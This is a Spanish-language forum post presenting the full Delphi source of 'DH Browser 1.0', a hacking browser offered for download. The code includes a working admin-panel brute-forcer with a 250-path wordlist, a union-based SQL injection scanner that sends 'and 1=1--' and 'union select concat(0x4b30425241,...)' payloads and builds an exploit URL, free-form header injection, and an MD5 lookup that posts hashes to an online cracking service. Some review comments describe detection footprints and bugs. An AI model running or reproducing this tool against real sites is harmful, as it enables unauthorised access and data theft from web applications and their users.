
[Delphi] DH Browser 1.0

MensajePublicado:05 Sep 2016, 02:34
por Doddy
Un navegador web en Delphi con las siguientes opciones:

[+] Podés ver el código fuente de la página cargada
[+] Se pueden modificar los headers para HTTP Header Injection
[+] Se pueden buscar palabras en el código fuente
[+] SQLI Scanner incorporado
[+] Admin Finder incorporado
[+] Crack MD5 incorporado (el hash se envía por HTTP sin cifrar a md5online.net, como se ve en el código)

Una imagen :



El codigo :
// DH Browser 1.0
// (C) Doddy Hackman 2016
// Credits :
// Navigate based on : http://www.swissdelphicenter.ch/torry/showcode.php?id=2242
// FindText based on : http://delphi.cjcsoft.net/viewthread.php?tid=47143
// Get HTML based on : http://delphi.about.com/od/adptips2005/qt/webbrowserhtml.htm

unit dh;

interface

uses
  Winapi.Windows, Winapi.Messages, System.SysUtils, System.Variants,
  System.Classes, Vcl.Graphics,
  Vcl.Controls, Vcl.Forms, Vcl.Dialogs, Vcl.StdCtrls, Vcl.OleCtrls, SHDocVw,
  Vcl.Imaging.pngimage, Vcl.ExtCtrls, Vcl.ComCtrls, mshtml, Vcl.Menus,
  IdBaseComponent, IdComponent, IdTCPConnection, IdTCPClient, IdHTTP, PerlRegEx,
  IdMultipartFormData, Vcl.ImgList, Vcl.Styles.Utils.ComCtrls,
  Vcl.Styles.Utils.Menus,
  Vcl.Styles.Utils.SysStyleHook,
  Vcl.Styles.Utils.SysControls, Vcl.Styles.Utils.Forms,
  Vcl.Styles.Utils.StdCtrls, Vcl.Styles.Utils.ScreenTips;

type
  // Main (and only) form of the tool. The published fields below are bound to
  // components declared in the .dfm (not shown here), so their names and
  // types must stay in sync with that file.
  TFormHome = class(TForm)
    gbEnterPage: TGroupBox;
    btnEnter: TButton;
    gbHeaders: TGroupBox;
    mmHeaders: TMemo; // free-text extra request headers, passed verbatim to browser.Navigate
    GroupBox3: TGroupBox;
    GroupBox4: TGroupBox;
    gbAbout: TGroupBox;
    txtURL: TEdit; // target URL; also overwritten by the Admin Finder and SQLI Scanner handlers
    imgLogo: TImage;
    imgAbout: TImage;
    btnSQLI_Scanner: TButton;
    btnAdminFinder: TButton;
    btnCrack_MD5: TButton;
    btnSearch_for_text: TButton;
    cbUse_This_Headers: TCheckBox; // when checked, mmHeaders.Text is sent with navigations
    browser: TWebBrowser; // SHDocVw web browser control that renders the page
    status: TStatusBar;
    progreso: TProgressBar;
    mmSource: TMemo; // receives the outerHTML of the loaded document
    menu: TPopupMenu;
    ShowSourceHTML1: TMenuItem;
    ShowBrowser1: TMenuItem;
    nave: TIdHTTP; // Indy HTTP client used for the scanner probes and the MD5 lookup
    buscar_codigo: TFindDialog; // find dialog that searches mmSource
    ilIconos: TImageList;
    lblAbout: TLabel;
    // Event handlers; presumably wired to the components in the .dfm.
    procedure btnEnterClick(Sender: TObject);
    procedure browserDownloadComplete(Sender: TObject);
    procedure browserProgressChange(ASender: TObject;
      Progress, ProgressMax: Integer);
    procedure ShowSourceHTML1Click(Sender: TObject);
    procedure ShowBrowser1Click(Sender: TObject);
    procedure btnSQLI_ScannerClick(Sender: TObject);
    procedure btnAdminFinderClick(Sender: TObject);
    procedure btnCrack_MD5Click(Sender: TObject);
    procedure btnSearch_for_textClick(Sender: TObject);
    procedure buscar_codigoFind(Sender: TObject);
    procedure FormCreate(Sender: TObject);

  private
    { Private declarations }
  public
    { Public declarations }
  end;

var
  // Global form instance. Several handlers reach the status bar through this
  // variable (FormHome.status) instead of Self.
  FormHome: TFormHome;

implementation

{$R *.dfm}

procedure TFormHome.btnAdminFinderClick(Sender: TObject);
// Requests each entry of a fixed 250-item path list under txtURL.Text with the
// Indy client (nave) and stops at the first request whose response code is
// 200; that URL is then written back to txtURL and opened in the browser.
//
// What this looks like from the server side: up to 250 sequential GET
// requests from one client for admin/login-style paths, most of them
// answered with an error status. The requests come from TIdHTTP, not from the
// embedded browser, so they carry whatever User-Agent nave.Request is
// configured with (Indy's library default unless the .dfm overrides it --
// TODO confirm), and the headers typed into mmHeaders are only applied to the
// final browser.Navigate call, not to the probes.
//
// NOTE(review): the whole loop runs on the UI thread, so the form does not
// process messages while the probes are in flight.
// NOTE(review): a server that answers 200 for unknown paths makes the first
// list entry look like a hit; only the status code is checked.
const
  paginas: array [1 .. 250] of string = ('admin/admin.asp', 'admin/login.asp',
    'admin/index.asp', 'admin/admin.aspx', 'admin/login.aspx',
    'admin/index.aspx', 'admin/webmaster.asp', 'admin/webmaster.aspx',
    'asp/admin/index.asp', 'asp/admin/index.aspx', 'asp/admin/admin.asp',
    'asp/admin/admin.aspx', 'asp/admin/webmaster.asp',
    'asp/admin/webmaster.aspx', 'admin/', 'login.asp', 'login.aspx',
    'admin.asp', 'admin.aspx', 'webmaster.aspx', 'webmaster.asp',
    'login/index.asp', 'login/index.aspx', 'login/login.asp',
    'login/login.aspx', 'login/admin.asp', 'login/admin.aspx',
    'administracion/index.asp', 'administracion/index.aspx',
    'administracion/login.asp', 'administracion/login.aspx',
    'administracion/webmaster.asp', 'administracion/webmaster.aspx',
    'administracion/admin.asp', 'administracion/admin.aspx', 'php/admin/',
    'admin/admin.php', 'admin/index.php', 'admin/login.php', 'admin/system.php',
    'admin/ingresar.php', 'admin/administrador.php', 'admin/default.php',
    'administracion/', 'administracion/index.php', 'administracion/login.php',
    'administracion/ingresar.php', 'administracion/admin.php',
    'administration/', 'administration/index.php', 'administration/login.php',
    'administrator/index.php', 'administrator/login.php',
    'administrator/system.php', 'system/', 'system/login.php', 'admin.php',
    'login.php', 'administrador.php', 'administration.php', 'administrator.php',
    'admin1.html', 'admin1.php', 'admin2.php', 'admin2.html', 'yonetim.php',
    'yonetim.html', 'yonetici.php', 'yonetici.html', 'adm/',
    'admin/account.php', 'admin/account.html', 'admin/index.html',
    'admin/login.html', 'admin/home.php', 'admin/controlpanel.html',
    'admin/controlpanel.php', 'admin.html', 'admin/cp.php', 'admin/cp.html',
    'cp.php', 'cp.html', 'administrator/', 'administrator/index.html',
    'administrator/login.html', 'administrator/account.html',
    'administrator/account.php', 'administrator.html', 'login.html',
    'modelsearch/login.php', 'moderator.php', 'moderator.html',
    'moderator/login.php', 'moderator/login.html', 'moderator/admin.php',
    'moderator/admin.html', 'moderator/', 'account.php', 'account.html',
    'controlpanel/', 'controlpanel.php', 'controlpanel.html',
    'admincontrol.php', 'admincontrol.html', 'adminpanel.php',
    'adminpanel.html', 'admin1.asp', 'admin2.asp', 'yonetim.asp',
    'yonetici.asp', 'admin/account.asp', 'admin/home.asp',
    'admin/controlpanel.asp', 'admin/cp.asp', 'cp.asp',
    'administrator/index.asp', 'administrator/login.asp',
    'administrator/account.asp', 'administrator.asp', 'modelsearch/login.asp',
    'moderator.asp', 'moderator/login.asp', 'moderator/admin.asp',
    'account.asp', 'controlpanel.asp', 'admincontrol.asp', 'adminpanel.asp',
    'fileadmin/', 'fileadmin.php', 'fileadmin.asp', 'fileadmin.html',
    'administration.html', 'sysadmin.php', 'sysadmin.html', 'phpmyadmin/',
    'myadmin/', 'sysadmin.asp', 'sysadmin/', 'ur-admin.asp', 'ur-admin.php',
    'ur-admin.html', 'ur-admin/', 'Server.php', 'Server.html', 'Server.asp',
    'Server/', 'wpadmin/', 'administr8.php', 'administr8.html', 'administr8/',
    'administr8.asp', 'webadmin/', 'webadmin.php', 'webadmin.asp',
    'webadmin.html', 'administratie/', 'admins/', 'admins.php', 'admins.asp',
    'admins.html', 'administrivia/', 'Database_Administration/', 'WebAdmin/',
    'useradmin/', 'sysadmins/', 'admin1/', 'systemadministration/',
    'administrators/', 'pgadmin/', 'directadmin/', 'staradmin/',
    'ServerAdministrator/', 'SysAdmin/', 'administer/', 'LiveUser_Admin/',
    'sysadmin/', 'typo3/', 'panel/', 'cpanel/', 'cPanel/', 'cpanel_file/',
    'platz_login/', 'rcLogin/', 'blogindex/', 'formslogin/', 'autologin/',
    'support_login/', 'meta_login/', 'manuallogin/', 'simpleLogin/',
    'loginflat/', 'utility_login/', 'showlogin/', 'memlogin/', 'members/',
    'login-redirect/', 'sublogin/', 'wplogin/', 'login1/', 'dirlogin/',
    'login_db/', 'xlogin/', 'smblogin/', 'customer_login/', 'UserLogin/',
    'loginus/', 'acct_login/', 'admin_area/', 'bigadmin/', 'project-admins/',
    'phppgadmin/', 'pureadmin/', 'sqladmin/', 'radmind/', 'openvpnadmin/',
    'wizmysqladmin/', 'vadmind/', 'ezsqliteadmin/', 'hpwebjetadmin/',
    'newsadmin/', 'adminpro/', 'Lotus_Domino_Admin/', 'bbadmin/', 'vmailadmin/',
    'Indy_admin/', 'ccp14admin/', 'irc-macadmin/', 'banneradmin/', 'sshadmin/',
    'phpldapadmin/', 'macadmin/', 'administratoraccounts/', 'admin4_account/',
    'admin4_colon/', 'radmind1/', 'SuperAdmin/', 'AdminTools/', 'cmsadmin/',
    'SysAdmin2/', 'globes_admin/', 'cadmins/', 'phpSQLiteAdmin/',
    'navSiteAdmin/', 'server_admin_small/', 'logo_sysadmin/', 'server/',
    'database_administration/', 'power_user/', 'system_administration/',
    'ss_vms_admin_sm/');
var
  i: Integer;
  control: Integer; // 0 = nothing found yet, 1 = a path answered 200

var
  cabeceras: OLEVariant; // extra headers argument for browser.Navigate
  uno: OLEVariant; // navigation flags
  dos: OLEVariant; // passed as '' (third Navigate argument)
  tres: OLEVariant; // passed as '' (fourth Navigate argument)

begin

  if not(txtURL.Text = '') then
  begin
    control := 0;

    status.Panels[0].Text := '[+] Finding Panel ....';
    FormHome.status.Update;

    for i := Low(paginas) to High(paginas) do

      // Checked at the top of every iteration: this is where the handler
      // really stops after a hit, because the Abort inside the try block
      // below is swallowed by its own exception handler.
      if (control = 1) then
      begin
        Abort;
      end
      else
      begin

        try

          status.Panels[0].Text := '[+] Testing : ' + paginas[i];
          FormHome.status.Update;

          // Always inserts a '/', so a base URL that already ends in '/'
          // produces a double slash in the requested path.
          nave.Get(txtURL.Text + '/' + paginas[i]);
          if nave.ResponseCode = 200 then
          begin

            // The base URL in the edit box is replaced by the hit.
            txtURL.Text := txtURL.Text + '/' + paginas[i];

            uno := navNoReadFromCache or navNoWriteToCache;
            dos := '';
            tres := '';

            if (cbUse_This_Headers.Checked) then
            begin
              cabeceras := mmHeaders.Text;
              browser.Navigate(txtURL.Text, uno, dos, tres, cabeceras);
            end
            else
            begin
              cabeceras := '';
              browser.Navigate(txtURL.Text, uno, dos, tres, cabeceras);
            end;
            control := 1;
            status.Panels[0].Text := '[+] Panel Found';
            FormHome.status.Update;
            MessageBox(0, 'Panel Found', 'DH Browser 1.0', MB_ICONINFORMATION);
            // NOTE(review): Abort raises EAbort, which descends from
            // Exception, so the "on E: Exception" handler below catches it.
            // The loop therefore continues to the next iteration, where
            // control = 1 triggers the Abort outside the try block. If the
            // hit is the last list entry there is no next iteration and the
            // "Panel not found" message below is shown as well.
            Abort;
          end;
        except
          // Both handlers are empty: protocol errors (non-success status
          // codes) and every other failure (DNS, connect, timeout) are
          // silently treated as "this path does not exist".
          on E: EIdHttpProtocolException do;
          on E: Exception do;
        end;

      end;

    status.Panels[0].Text := '[-] Panel not found';
    FormHome.status.Update;
    MessageBox(0, 'Panel not found', 'DH Browser 1.0', MB_ICONERROR);
  end
  else
  begin
    MessageBox(0, 'Enter URL', 'DH Browser 1.0', MB_ICONINFORMATION);
  end;

end;

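procedure TFormHome.browserDownloadComplete(Sender: TObject);
// Resets the progress bar and copies the markup of the loaded document into
// mmSource.
//
// The text shown is the outerHTML of the root element, i.e. the browser's
// parsed DOM serialised back to text. It is not the byte stream the server
// sent, so it can differ from the raw response.
//
// Based on : http://delphi.about.com/od/adptips2005/qt/webbrowserhtml.htm
var
  documento: IHTMLDocument2;
  buscador: IHTMLElement;
begin

  progreso.Position := 0;

  status.Panels[0].Text := '[+] Page loaded';
  FormHome.status.Update;

  try
    mmSource.Clear;

    // The document may be missing or may not be an HTML document at all;
    // check instead of letting a failed cast or a nil dereference raise.
    if not Supports(browser.Document, IHTMLDocument2, documento) then
      Exit;

    // The event can fire before the document has a body.
    buscador := documento.body;
    if buscador = nil then
      Exit;

    // Walk up to the root element so the whole document is captured,
    // not only <body>.
    while buscador.parentElement <> nil do
      buscador := buscador.parentElement;

    mmSource.Lines.Add(buscador.outerHTML);
  except
    // Best effort, as in the original: a COM failure while reading the DOM
    // leaves the source view empty instead of interrupting navigation.
  end;
end;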

procedure TFormHome.browserProgressChange(ASender: TObject;
  Progress, ProgressMax: Integer);
// Mirrors the browser control's download progress on the progress bar.
begin
  // The range is set first so the new position is evaluated against the
  // maximum that belongs to this notification.
  Self.progreso.Max := ProgressMax;
  Self.progreso.Position := Progress;
end;

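procedure TFormHome.buscar_codigoFind(Sender: TObject);
// Finds the next occurrence of the dialog's search text in mmSource, starting
// right after the current selection, and selects it. The comparison is
// case-sensitive (StrPos). Focus always returns to the memo.
//
// FindText based on : http://delphi.cjcsoft.net/viewthread.php?tid=47143
//
// This version searches the memo text through ordinary strings. The earlier
// code sized two GetMem buffers in bytes while copying characters into them
// (PChar is a wide-character pointer in Unicode Delphi), kept the text length
// in a 16-bit Word, and never released either buffer; page source comes from
// the remote site, so its length is not under the user's control.
var
  dialogo: TFindDialog;
  texto: string;
  buscado: string;
  inicio: Integer;
  base: PChar;
  hallado: PChar;
begin

  dialogo := Sender as TFindDialog;
  buscado := dialogo.FindText;
  texto := mmSource.Text;

  // Search resumes immediately after whatever is selected now.
  inicio := mmSource.SelStart + mmSource.SelLength;

  // Only search when there is something to look for and the start offset
  // lies inside the text.
  if (buscado <> '') and (inicio >= 0) and (inicio < Length(texto)) then
  begin
    base := PChar(texto);
    hallado := StrPos(base + inicio, PChar(buscado));

    if hallado <> nil then
    begin
      // Pointer difference is the character offset of the match.
      mmSource.SelStart := hallado - base;
      mmSource.SelLength := Length(buscado);
    end;
  end;

  mmSource.SetFocus;

end;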

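procedure TFormHome.btnCrack_MD5Click(Sender: TObject);
// Asks for an MD5 digest, submits it to an online lookup form and shows the
// plaintext the service reports, if any.
//
// NOTE(review): the digest is posted to a third-party site over plain HTTP,
// so it is disclosed to that service and readable on the network path. The
// reply is equally unauthenticated; the value shown comes straight from the
// response body.
//
// The input is checked to be 32 hexadecimal characters before anything is
// sent, so text that is not an MD5 digest never leaves the machine. The
// regex object and the form stream are released on every path, including
// when the POST raises.
var
  md5: string;
  datos: TIdMultiPartFormDataStream;
  code: string;
  regex_check: TPerlRegEx;
  cracked: string;
  i: Integer;
  es_md5: Boolean;
begin

  md5 := Trim(InputBox('DH Browser 1.0', 'MD5 : ', ''));

  if md5 = '' then
    Exit;

  // An MD5 digest in hex is exactly 32 characters from 0-9 / a-f.
  es_md5 := Length(md5) = 32;
  if es_md5 then
    for i := 1 to Length(md5) do
      if not CharInSet(md5[i], ['0' .. '9', 'a' .. 'f', 'A' .. 'F']) then
      begin
        es_md5 := False;
        Break;
      end;

  if not es_md5 then
  begin
    status.Panels[0].Text := '[-] Invalid MD5';
    FormHome.status.Update;
    MessageBox(0, 'Invalid MD5', 'DH Browser 1.0', MB_ICONERROR);
    Exit;
  end;

  regex_check := nil;
  datos := nil;
  try
    regex_check := TPerlRegEx.Create();
    datos := TIdMultiPartFormDataStream.Create;
    datos.AddFormField('pass', md5);
    datos.AddFormField('option', 'hash2text');
    datos.AddFormField('send', 'Submit');

    status.Panels[0].Text := '[+] Cracking ...';
    FormHome.status.Update;

    // Transport errors propagate to the caller as before; the finally block
    // below still frees both objects.
    code := nave.Post('http://md5online.net/index.php', datos);

    // Second capture group is the plaintext reported by the service.
    regex_check.regex :=
      '<center><p>md5 :<b>(.*?)</b> <br>pass : <b>(.*?)</b></p>';
    regex_check.Subject := code;

    if regex_check.Match then
    begin
      cracked := regex_check.Groups[2];
      status.Panels[0].Text := '[+] MD5 Cracked : ' + cracked;
      FormHome.status.Update;
      MessageBox(0, PChar('MD5 Cracked : ' + cracked), 'DH Browser 1.0',
        MB_ICONINFORMATION);
    end
    else
    begin
      status.Panels[0].Text := '[-] Not found';
      FormHome.status.Update;
      MessageBox(0, 'Not found', 'DH Browser 1.0', MB_ICONERROR);
    end;
  finally
    datos.Free;
    regex_check.Free;
  end;

end;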

procedure TFormHome.btnEnterClick(Sender: TObject);
// Loads the URL from txtURL in the embedded browser, bypassing the cache in
// both directions. When "use this headers" is checked, the text of mmHeaders
// is handed to Navigate unmodified as the additional-headers argument.
//
// Navigate based on : http://www.swissdelphicenter.ch/torry/showcode.php?id=2242
var
  banderas: OLEVariant;
  marco_destino: OLEVariant;
  datos_post: OLEVariant;
  cabeceras_extra: OLEVariant;
begin

  banderas := navNoReadFromCache or navNoWriteToCache;
  marco_destino := '';
  datos_post := '';

  // The only difference between the two modes is the header string.
  if cbUse_This_Headers.Checked then
    cabeceras_extra := mmHeaders.Text
  else
    cabeceras_extra := '';

  browser.Navigate(txtURL.Text, banderas, marco_destino, datos_post,
    cabeceras_extra);

end;

procedure TFormHome.FormCreate(Sender: TObject);
// Switches the VCL common dialogs to their classic implementation when the
// form is created.
// NOTE(review): presumably done for the find dialog (buscar_codigo) -- confirm.
begin
  Vcl.Dialogs.UseLatestCommonDialogs := False;
end;

procedure TFormHome.btnSearch_for_textClick(Sender: TObject);
// Opens the find dialog; the search itself runs in buscar_codigoFind.
begin
  Self.buscar_codigo.Execute;
end;

procedure TFormHome.ShowBrowser1Click(Sender: TObject);
// Menu action: show the rendered page and hide the source memo.
begin
  Self.browser.Visible := True;
  Self.mmSource.Visible := False;
end;

procedure TFormHome.ShowSourceHTML1Click(Sender: TObject);
// Menu action: hide the rendered page and show the source memo.
begin
  Self.browser.Visible := False;
  Self.mmSource.Visible := True;
end;

procedure TFormHome.btnSQLI_ScannerClick(Sender: TObject);
// Appends test expressions to txtURL.Text and requests them with the Indy
// client (nave): first a pair of requests whose bodies are compared, then up
// to 35 requests with a growing UNION SELECT column list. Each column is
// wrapped in the marker 0x4b30425241 (the ASCII bytes of "K0BRA"), and the
// response is searched for that marker.
//
// What this looks like from the server side: a short burst of GETs from one
// client whose query string contains "and+1=1--" / "and+1=0--" followed by
// "union+select+concat(0x4b30425241,". The hex marker is a fixed literal in
// this code, which makes it a usable log/WAF match string for this tool.
//
// NOTE(review): the expressions are appended directly to the URL text, so
// the handler presumably expects a URL that ends in "param=" -- confirm.
// NOTE(review): regex_check is created below and never freed.
// NOTE(review): all requests run on the UI thread, and exceptions raised by
// nave.Get are not handled here.
var
  pass1: string; // separator placed between tokens ('+')
  pass2: string; // trailing comment marker ('--')
  code: string; // response body of the current request
  urltest: string; // expression sent to the server
  urlgen: string; // plain column list 1,2,3,... built alongside urltest
  full: string; // final URL written back to txtURL
  codedos: string; // response body of the second comparison request
  i: Integer;
  regex_check: TPerlRegEx;

var

  cabeceras: OLEVariant; // extra headers argument for browser.Navigate
  uno: OLEVariant; // navigation flags
  dos: OLEVariant; // passed as '' (third Navigate argument)
  tres: OLEVariant; // passed as '' (fourth Navigate argument)

begin

  if not(txtURL.Text = '') then
  begin
    regex_check := TPerlRegEx.Create();

    status.Panels[0].Text := '[+] SQLI Scanning ...';
    FormHome.status.Update;

    pass1 := '+';
    pass2 := '--';

    // This value is not used: urltest is reassigned before its first read.
    urltest := 'concat(0x4b30425241,1,0x4b30425241)';

    status.Panels[0].Text := '[+] Checking ...';
    FormHome.status.Update;

    code := nave.Get(txtURL.Text + '1' + pass1 + 'and' + pass1 + '1=1' + pass2);

    codedos := nave.Get(txtURL.Text + '1' + pass1 + 'and' + pass1 +
      '1=0' + pass2);

    // The verdict rests on the two bodies not being byte-identical.
    // NOTE(review): any per-request content in the page (timestamps, tokens,
    // rotating banners) also makes the bodies differ, so this branch can be
    // taken for a page that is not injectable.
    if not(code = codedos) then
    begin

      status.Panels[0].Text := '[+] Finding columns number';
      FormHome.status.Update;

      urltest := '1' + pass1 + 'and' + pass1 + '1=0' + pass1 + 'union' + pass1 +
        'select' + pass1 + 'concat(0x4b30425241,1,0x4b30425241)';
      urlgen := '1';
      // One request per candidate column count, 2 through 36.
      for i := 2 to 36 do
      begin

        status.Panels[0].Text := '[+] Columns Length : ' + IntToStr(i);
        FormHome.status.Update;
        urltest := urltest + ',concat(0x4b30425241,' + IntToStr(i) +
          ',0x4b30425241)';
        urlgen := urlgen + ',' + IntToStr(i);
        code := nave.Get(txtURL.Text + urltest + pass2);

        // Group 1 is whatever the page echoed between two markers.
        regex_check.regex := 'K0BRA(.*?)K0BRA';
        regex_check.Subject := code;

        if regex_check.Match then
        begin

          // Replaces the first occurrence of the echoed text in the column
          // list with the literal 'hackman' (no flags, so first match only).
          urlgen := StringReplace(urlgen, regex_check.Groups[1], 'hackman', []);
          full := txtURL.Text + '1' + pass1 + 'and' + pass1 + '1=0' + pass1 +
            'union' + pass1 + 'select' + pass1 + urlgen;

          // The base URL in the edit box is replaced by the generated one.
          txtURL.Text := full;

          uno := navNoReadFromCache or navNoWriteToCache;
          dos := '';
          tres := '';

          if (cbUse_This_Headers.Checked) then
          begin
            cabeceras := mmHeaders.Text;
            browser.Navigate(txtURL.Text, uno, dos, tres, cabeceras);
          end
          else
          begin
            cabeceras := '';
            browser.Navigate(txtURL.Text, uno, dos, tres, cabeceras);
          end;
          status.Panels[0].Text := '[+] SQI Scanner Finished';
          FormHome.status.Update;
          MessageBox(0, 'SQI Scanner Finished', 'DH Browser 1.0',
            MB_ICONINFORMATION);

          // Not inside a try block here, so this EAbort leaves the handler.
          Abort;

        end;

      end;
      status.Panels[0].Text := '[-] Columns length not found';
      FormHome.status.Update;
      MessageBox(0, 'Columns length not found', 'DH Browser 1.0', MB_ICONERROR);
    end
    else
    begin
      status.Panels[0].Text := '[-] Not vulnerable';
      FormHome.status.Update;
      MessageBox(0, 'Not vulnerable', 'DH Browser 1.0', MB_ICONERROR);
    end;

    // Reached on both failure paths, so the status bar ends on "Done" and
    // the failure text is only visible while the message box is open.
    status.Panels[0].Text := '[+] Done';
    FormHome.status.Update;
  end
  else
  begin
    MessageBox(0, 'Enter URL', 'DH Browser 1.0', MB_ICONINFORMATION);
  end;

end;

end.

// The End ?
Si quieren bajar el programa, lo pueden hacer desde acá:

[ Debe registrarse para ver este enlace ].
[ Debe registrarse para ver este enlace ].

Eso sería todo.